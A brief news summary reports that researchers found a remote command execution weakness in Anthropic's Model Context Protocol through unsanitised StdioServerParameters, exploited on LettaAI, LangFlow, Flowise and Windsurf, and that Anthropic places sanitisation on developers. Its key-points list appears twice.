Researchers have identified a significant security flaw in Anthropic's Model Context Protocol, which is designed to connect Large Language Models with external tools. The protocol's architecture allows for remote command execution because the parameters used to create server instances can contain arbitrary commands that are executed in a server-side shell without proper input sanitization. This vulnerability has been demonstrated on platforms like LettaAI, LangFlow, Flowise, and Windsurf. When researchers brought these findings to Anthropic, the company responded that there was no design flaw and stated it is the developer's responsibility to implement sanitization.
Key points:
- MCP architecture facilitates remote command execution (RCE) via StdioServerParameters.
- Lack of input sanitization allows arbitrary commands and arguments in server-side shells.
- Exploitation has been successful against LettaAI, LangFlow, Flowise, and Windsurf.
- Anthropic maintains the protocol works as designed, placing responsibility on developers for security implementation.
Key points:
- MCP architecture facilitates remote command execution (RCE) via StdioServerParameters.
- Lack of input sanitization allows arbitrary commands and arguments in server-side shells.
- Exploitation has been successful against LettaAI, LangFlow, Flowise, and Windsurf.
- Anthropic maintains the protocol works as designed, placing responsibility on developers for security implementation.
